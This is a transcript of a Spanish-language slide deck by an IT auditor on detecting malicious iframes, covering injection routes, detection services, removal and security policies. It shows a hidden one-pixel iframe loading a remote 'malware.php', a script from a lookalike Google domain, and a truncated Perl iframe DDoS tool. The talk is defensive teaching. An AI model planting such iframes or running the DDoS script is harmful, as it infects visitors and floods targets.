DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de...

26
DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Transcript of DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de...

Page 1: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

DETECTANDO IFRAMES

MALICIOSOS

Formas de Intrusión

Mecanismos de Defensa

José A. García

Auditor Informático

Page 2: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

ÍNDICE

• Conceptos Generales sobre iFrames• Funcionamiento de una iFrame• iFrames Maliciosas• Formas de Intrusión• Herramientas de Detección• Eliminación• Políticas de Control • Demostración• Tiempo de Preguntas

Page 3: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

• Qué es una iFrame• Atributos de una iFrame

CONCEPTOS GENERALES SOBRE IFRAMES

Page 4: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Qué es una iFrame

<html> <head><title>IFrames</title>

</head><body>

<iframe src="http://www.unejemplo.com/" name="SubHtml"width="400" height="500" scrolling="auto" frameborder="1"><p>Texto alternativo para navegadores que no aceptan iframes.</p>

</iframe></body>

</html>

Page 6: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

FUNCIONAMIENTO DE UNA IFRAME

Page 7: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Funcionamiento de una iFrame

<div class="figure" id="figure_11_3"><img src="/img/xhtml/f1103.gif" alt="Acceso a Google Analytics">

</div>

<script async="" src="//p.goodle.com/pg/js/google.js"></script>

• Una llamada a una iFrame suele ir acompañada de código. • La iFrame es sólo Una función que llama a otra

página web independiente, anidada en la primera

Page 8: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

IFRAMES MALICIOSAS

Page 9: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

No sólo se ejecutan en HTML#!usr/bin/perl#Iframe DDos Attack Tool

use Cwd;installer();

sub sintax {print "\n[+] sintax : $0 <target> <count file> <count iframe>\n"; }

sub start {my ($target,$files,$iframe) = @_;print "\n[+] Starting the party\n\n";print "[+] Generating files and iframes\n";for my $tx(1..$iframe) {print POC '<iframe src="'.$target.'" width="3" height="3"></iframe><br>';}………………………….

Page 10: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Formas de IntrusiónAtaques a Servidores FTP

Page 11: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Formas de Intrusión

Vulnerabilidades en páginas Web

<iframe src="http://xxx.xxx.xxx.xxx/badcode/malware.php?js" name="BadCode" width="1" height="1" style="visibility:hidden"></iframe>

Page 12: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Entornos Preferidos por los Hackers

CMS (Content Management System)

JoomlaWordPressDrupal…

LMS (Learning Management System)

MoodleIliasClaroLine

Page 13: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

HERRAMIENTAS DE DETECCIÓN• Visual• Google

• WebMaster Tools• Google SafeBrowsing• Foro para Webmasters• Blog Central para Webmasters• Blog de Seguridad Online

• Otros• StopBadware• SiteCheck.sucuri.net• Unmaskparasites• Strictly-Software• Detox

Page 14: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Detección Visual

Page 15: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Google WebMaster Tools

https://www.google.com/webmasters/

Page 16: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Google SafeBrowsing

http://www.google.com/safebrowsing/diagnostic?site=www.nuestraweb.com

Page 17: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

StopBadware

https://www.stopbadware.org/clearinghouse/search

Page 18: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

SiteCheck.Sucuri.Net

http://sitecheck.sucuri.net

Page 19: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

UnmaskParasiteshttp://www.unmaskparasites.com

Page 21: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

Detoxhttp://www.linkdetox.com

Page 22: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

ELIMINACIÓN• Uso de Comandos de Sistema Operativo• Restauración de datos desde una Copia de Seguridad fiable• Informar a los responsables del WebSite• Uso de Scripts de Limpieza

Page 23: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

POLÍTICAS DE CONTROL• Actualizar Directivas de Seguridad de Sistemas Operativos• Actualizar Navegadores de Internet• Actualizar sistemas de Protección

• Antivirus• Cortafuegos• Protección de Red

• Actualizar Versiones y Plugins de los CMS y LMS• Actualizar aplicaciones de terceros

• Java• Adobe

• To ar Precaucio es co el “oftware Pirata y sus parches• Antivirus – Cortafuegos – Control de Redes• Buena Política de Contraseñas• Hacer Copias de Seguridad Periódicas• Revisar Permisos de Archivos y Directorios

Page 24: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

DEMOSTRACIÓN

Page 25: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

TIEMPO DEPREGUNTAS

Page 26: DETECTANDO IFRAMES MALICIOSOS - innovarioja.tv · DETECTANDO IFRAMES MALICIOSOS Formas de Intrusión Mecanismos de Defensa José A. García Auditor Informático

GRACIAS!!